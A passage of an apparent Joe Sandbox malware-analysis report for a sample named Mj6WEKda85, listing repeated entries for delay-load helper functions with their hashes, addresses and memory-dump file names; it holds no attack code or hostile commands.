Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bd2d97e595abbcb4f998ebce9b7bb1447d06456b7d8e753b62ef16e4c271d3bc
Instruction ID: 2c61062ee8001d16e06301c20cefa431d6581eb0dd3aa94476f98dbbdfd124ae
Opcode Fuzzy Hash: bd2d97e595abbcb4f998ebce9b7bb1447d06456b7d8e753b62ef16e4c271d3bc
Instruction Fuzzy Hash: 2EB0929126C2016C2108B1496A02E3A0268F9C4B10320C52FB10EC01889844C8095432

Function 0087DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DBD5

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3ca23d41d061ed35fbb71b3189d73f0568e54360f986ca5eaecdd15537c1f8cb
Instruction ID: bebb93e5286b8fb3c6b59c655032f9cbd5d460165a86b5eea9b8846b34ab523d
Opcode Fuzzy Hash: 3ca23d41d061ed35fbb71b3189d73f0568e54360f986ca5eaecdd15537c1f8cb
Instruction Fuzzy Hash: 00B0929526820A6D220861442D06D3A023CF980B20324852EB10ED00849950CC494032

Function 0087DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DBD5

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c3d72c3bed70f169dc74d34eb3b1d43f4b6587b3e71dc5f51374bd51ee4e0d50
Instruction ID: 15de2da2b491bb730852ad863bb590ab8be8dc4316589d4e1ab32e3e80f121a3
Opcode Fuzzy Hash: c3d72c3bed70f169dc74d34eb3b1d43f4b6587b3e71dc5f51374bd51ee4e0d50
Instruction Fuzzy Hash: C9B092952682056D2108A1582906E3A023DF980B20324842EB11EC01849D50CC094032

Function 0087DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DBD5

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 692e0a43d8c15e2bade30f1172a580c33829da865a5264fa113d36a03d0644a6
Instruction ID: 785e987251d8bf854eba2e975bd73ab1d80dc53525adbe98c8b34792a118e7a6
Opcode Fuzzy Hash: 692e0a43d8c15e2bade30f1172a580c33829da865a5264fa113d36a03d0644a6
Instruction Fuzzy Hash: 9FB09295268206AD2108A1482906E3A027CF980B20324C41EB50EC1188D950CC094032

Function 0087DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DBD5

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9248c8f6789263716354e54d4efa269800c22163e213a648ca0462e954906e3a
Instruction ID: 515c48b3226cc232f57331cffe24be254c6c45b9981a55196429046afa3bfd8b
Opcode Fuzzy Hash: 9248c8f6789263716354e54d4efa269800c22163e213a648ca0462e954906e3a
Instruction Fuzzy Hash: CFB092952682066D2108A1482A06E3A027CF980B20324C41EB20EC01849990CC0A4032

Function 0087DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DAB2

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 92ae0ae5d9c1bff4288b218ce4b562fb95de2f3de047bfc0956a747b356ef5b1
Instruction ID: bba23839f285fc2403a31644b44423f3d47041245f62fc32891e0d57c47a22a6
Opcode Fuzzy Hash: 92ae0ae5d9c1bff4288b218ce4b562fb95de2f3de047bfc0956a747b356ef5b1
Instruction Fuzzy Hash: C0B092912AC2056C2108B1496A02E3A0268F9C0B10320811FB40EC01889844CC085532

Function 0087DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DC36

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e1637037c65c246a1d45ee45746ecf71c6bd5491430da757bde8ce5cbfb74a5d
Instruction ID: f4a7770097e9dac3c1a7e1f579cc3c12de06ecb3ffe6380f91e5e3b1f0858c58
Opcode Fuzzy Hash: e1637037c65c246a1d45ee45746ecf71c6bd5491430da757bde8ce5cbfb74a5d
Instruction Fuzzy Hash: 32B09295268305AD210861446A02D3A023CEAC0B10324861EB20AE01849980FC885032

Function 0087DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DC36

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 674c20c4612fde2bfe1b4156888bd6d5272183784072c13c7219ecdf15ce8e3e
Instruction ID: dc0a67729ab6b636f6c72eb981ccd8ceaff17b7160d6915aeb4169fadd35acb4
Opcode Fuzzy Hash: 674c20c4612fde2bfe1b4156888bd6d5272183784072c13c7219ecdf15ce8e3e
Instruction Fuzzy Hash: CBB0129526C301ED310CB1487D02E3A023CFAC4F10334C51FF60ED1284D980FC484032

Function 0087DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DC36

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d4ccb9d0a12899816bab3ee494f4a8154afd1ad516d3c6a9a392c8574eb1616e
Instruction ID: e3087169f5506b5137d168a420dcda8d823064f0add6b3bacd2af5b70e60caad
Opcode Fuzzy Hash: d4ccb9d0a12899816bab3ee494f4a8154afd1ad516d3c6a9a392c8574eb1616e
Instruction Fuzzy Hash: B1B09295268301AD3108A1486902E3A023CFAC0B10324851FB20ED12849980FC484032

Function 0087D8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c87f592c68ccbc82156dc514a2319659dde36d93c44813ff3d157b073acf66f7
Instruction ID: 70ad526fb55f498ae57e8c9a786e3efcd6acc1624640f14a4ee7eebf80e0d08b
Opcode Fuzzy Hash: c87f592c68ccbc82156dc514a2319659dde36d93c44813ff3d157b073acf66f7
Instruction Fuzzy Hash: D0A011A22AC202BC3008B200BE02C3A022CECC0BA0330C82EF00FE02C8A880AC080832

Function 0087D983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 63a62a3fc72b604b41817ba6690c933fc1689223a62442327b4198a048dd48da
Instruction ID: 70ad526fb55f498ae57e8c9a786e3efcd6acc1624640f14a4ee7eebf80e0d08b
Opcode Fuzzy Hash: 63a62a3fc72b604b41817ba6690c933fc1689223a62442327b4198a048dd48da
Instruction Fuzzy Hash: D0A011A22AC202BC3008B200BE02C3A022CECC0BA0330C82EF00FE02C8A880AC080832

Function 0087D98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9fd9ce740ab88e854fc3f31189b174388a4731698f4a7045a9a88392c2213b74
Instruction ID: 70ad526fb55f498ae57e8c9a786e3efcd6acc1624640f14a4ee7eebf80e0d08b
Opcode Fuzzy Hash: 9fd9ce740ab88e854fc3f31189b174388a4731698f4a7045a9a88392c2213b74
Instruction Fuzzy Hash: D0A011A22AC202BC3008B200BE02C3A022CECC0BA0330C82EF00FE02C8A880AC080832

Function 0087D997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 356d9941719e99c6ae5b473d2cbecad2b05bc4d6cd912c618f7b74e17b0b2037
Instruction ID: 70ad526fb55f498ae57e8c9a786e3efcd6acc1624640f14a4ee7eebf80e0d08b
Opcode Fuzzy Hash: 356d9941719e99c6ae5b473d2cbecad2b05bc4d6cd912c618f7b74e17b0b2037
Instruction Fuzzy Hash: D0A011A22AC202BC3008B200BE02C3A022CECC0BA0330C82EF00FE02C8A880AC080832

Function 0087D91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a6329ab5881236ff1786ed03c9bc580b6ef17d82f26b0b1e39c9a05a1499ce47
Instruction ID: 70ad526fb55f498ae57e8c9a786e3efcd6acc1624640f14a4ee7eebf80e0d08b
Opcode Fuzzy Hash: a6329ab5881236ff1786ed03c9bc580b6ef17d82f26b0b1e39c9a05a1499ce47
Instruction Fuzzy Hash: D0A011A22AC202BC3008B200BE02C3A022CECC0BA0330C82EF00FE02C8A880AC080832

Function 0087D93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ea7d7db3e60a6e6aa15f16c073eb39a647466a1a4726849399498f3665f85097
Instruction ID: 70ad526fb55f498ae57e8c9a786e3efcd6acc1624640f14a4ee7eebf80e0d08b
Opcode Fuzzy Hash: ea7d7db3e60a6e6aa15f16c073eb39a647466a1a4726849399498f3665f85097
Instruction Fuzzy Hash: D0A011A22AC202BC3008B200BE02C3A022CECC0BA0330C82EF00FE02C8A880AC080832

Function 0087D951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2390475667cd94fe74788c47c0fbc84606431c906295c431b6607f4d93f28caf
Instruction ID: 70ad526fb55f498ae57e8c9a786e3efcd6acc1624640f14a4ee7eebf80e0d08b
Opcode Fuzzy Hash: 2390475667cd94fe74788c47c0fbc84606431c906295c431b6607f4d93f28caf
Instruction Fuzzy Hash: D0A011A22AC202BC3008B200BE02C3A022CECC0BA0330C82EF00FE02C8A880AC080832

Function 0087D95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e162ae87f28a07d1c9418498f3ef991a479b9a951d140d246a16a804ac72d9e7
Instruction ID: 70ad526fb55f498ae57e8c9a786e3efcd6acc1624640f14a4ee7eebf80e0d08b
Opcode Fuzzy Hash: e162ae87f28a07d1c9418498f3ef991a479b9a951d140d246a16a804ac72d9e7
Instruction Fuzzy Hash: D0A011A22AC202BC3008B200BE02C3A022CECC0BA0330C82EF00FE02C8A880AC080832

Function 0087D965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

